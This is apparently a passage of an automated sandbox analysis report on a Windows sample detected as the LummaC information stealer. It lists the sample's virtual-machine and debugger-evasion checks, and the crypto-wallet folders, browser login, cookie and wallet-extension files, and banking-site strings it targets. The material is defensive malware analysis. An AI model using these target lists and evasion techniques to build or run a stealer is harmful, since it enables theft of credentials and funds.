Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: Amcache.hve.8.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: Amcache.hve.8.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: Amcache.hve.8.dr	Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
Source: Amcache.hve.8.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

API call chain: ExitProcess graph end node

graph_0-73723

Anti Debugging

Contains functionality to hide a thread from the debugger

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Code function: 0_2_004244E4 NtSetInformationThread 000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC64

0_2_004244E4

Found API chain indicative of debugger detection

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep

graph_0-73808

Hides threads from debuggers

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Process queried: DebugFlags	Jump to behavior

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Code function: 0_2_00429EF7 rdtsc

0_2_00429EF7

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Code function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0044E33B

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Code function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,

0_2_0041F9A4

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00422177 mov eax, dword ptr fs:[00000030h]	0_2_00422177
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00443998 mov ecx, dword ptr fs:[00000030h]	0_2_00443998
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041F9A4 mov eax, dword ptr fs:[00000030h]	0_2_0041F9A4
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_004262A1 mov eax, dword ptr fs:[00000030h]	0_2_004262A1
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0043B362 mov eax, dword ptr fs:[00000030h]	0_2_0043B362
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0044FB15 mov eax, dword ptr fs:[00000030h]	0_2_0044FB15
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_004244E4 mov eax, dword ptr fs:[00000030h]	0_2_004244E4
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_004224A3 mov eax, dword ptr fs:[00000030h]	0_2_004224A3
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_004245EC mov eax, dword ptr fs:[00000030h]	0_2_004245EC
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00421EEB mov eax, dword ptr fs:[00000030h]	0_2_00421EEB
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00422817 mov eax, dword ptr fs:[00000030h]	0_2_00422817
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041F916 mov eax, dword ptr fs:[00000030h]	0_2_0041F916
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_004269E4 mov eax, dword ptr fs:[00000030h]	0_2_004269E4
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]	0_2_00424995
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]	0_2_00424995
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00426A42 mov eax, dword ptr fs:[00000030h]	0_2_00426A42
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0042F265 mov eax, dword ptr fs:[00000030h]	0_2_0042F265
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00424B24 mov eax, dword ptr fs:[00000030h]	0_2_00424B24
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041EBEB mov eax, dword ptr fs:[00000030h]	0_2_0041EBEB
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00424BED mov eax, dword ptr fs:[00000030h]	0_2_00424BED
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00424C8D mov eax, dword ptr fs:[00000030h]	0_2_00424C8D
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0041E6F0 mov eax, dword ptr fs:[00000030h]	0_2_0041E6F0
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00429EF7 mov eax, dword ptr fs:[00000030h]	0_2_00429EF7
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A4853 mov eax, dword ptr fs:[00000030h]	0_2_008A4853
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0088092B mov eax, dword ptr fs:[00000030h]	0_2_0088092B
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008AA15E mov eax, dword ptr fs:[00000030h]	0_2_008AA15E
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A2152 mov eax, dword ptr fs:[00000030h]	0_2_008A2152
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0089E957 mov eax, dword ptr fs:[00000030h]	0_2_0089E957
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A2A7E mov eax, dword ptr fs:[00000030h]	0_2_008A2A7E
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A23DE mov eax, dword ptr fs:[00000030h]	0_2_008A23DE
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008C3BFF mov ecx, dword ptr fs:[00000030h]	0_2_008C3BFF
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A4BFC mov eax, dword ptr fs:[00000030h]	0_2_008A4BFC
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A4BFC mov eax, dword ptr fs:[00000030h]	0_2_008A4BFC
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0089FB7D mov eax, dword ptr fs:[00000030h]	0_2_0089FB7D
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A6CA9 mov eax, dword ptr fs:[00000030h]	0_2_008A6CA9
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008AF4CC mov eax, dword ptr fs:[00000030h]	0_2_008AF4CC
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0089FC0B mov eax, dword ptr fs:[00000030h]	0_2_0089FC0B
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A6C4B mov eax, dword ptr fs:[00000030h]	0_2_008A6C4B
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A4D8B mov eax, dword ptr fs:[00000030h]	0_2_008A4D8B
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00880D90 mov eax, dword ptr fs:[00000030h]	0_2_00880D90
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008BB5C9 mov eax, dword ptr fs:[00000030h]	0_2_008BB5C9
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A6508 mov eax, dword ptr fs:[00000030h]	0_2_008A6508
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008CFD7C mov eax, dword ptr fs:[00000030h]	0_2_008CFD7C
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A4EF4 mov eax, dword ptr fs:[00000030h]	0_2_008A4EF4
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0089EE52 mov eax, dword ptr fs:[00000030h]	0_2_0089EE52
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A4E54 mov eax, dword ptr fs:[00000030h]	0_2_008A4E54
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A270A mov eax, dword ptr fs:[00000030h]	0_2_008A270A
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008A474B mov eax, dword ptr fs:[00000030h]	0_2_008A474B
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_00979B5B push dword ptr fs:[00000030h]	0_2_00979B5B

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Code function: 0_2_0043323B GetProcessHeap,CreateDCW,GetSystemMetrics,GetSystemMetrics,DeleteDC,

0_2_0043323B

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0044E33B
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0043D3A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0043D3A0
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0043CE89 SetUnhandledExceptionFilter,	0_2_0043CE89
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_0043CE95 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0043CE95
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008BD0FC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008BD0FC
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008BD0F0 SetUnhandledExceptionFilter,	0_2_008BD0F0
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008CE5A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008CE5A2
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	Code function: 0_2_008BD607 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_008BD607

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Code function: 0_2_0043D0B8 cpuid

0_2_0043D0B8

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Code function: 0_2_0044614F GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_0044614F

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Code function: 0_2_00402476 GetComputerNameW,GetUserNameW,

0_2_00402476

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe

Code function: 0_2_00453BC4 GetTimeZoneInformation,

0_2_00453BC4

Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.8.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 0.3.OlZzqwjrwO.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OlZzqwjrwO.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.OlZzqwjrwO.exe.8f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.OlZzqwjrwO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1340247273.00000000008F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3107514076.0000000002ACF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.3106792811.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OlZzqwjrwO.exe PID: 7712, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: OlZzqwjrwO.exe	String found in binary or memory: %appdata%\Electrum\wallets
Source: OlZzqwjrwO.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: OlZzqwjrwO.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: OlZzqwjrwO.exe	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: OlZzqwjrwO.exe, 00000000.00000002.3108751929.000000000334D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance,(B
Source: OlZzqwjrwO.exe, 00000000.00000002.3108751929.000000000334D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum
Source: OlZzqwjrwO.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000314C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystoreD+
Source: OlZzqwjrwO.exe, 00000000.00000002.3108751929.000000000334D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENT	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbml	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfel	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG	Jump to behavior
Source: C:\Users\user\Desktop\OlZzqwjrwO.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
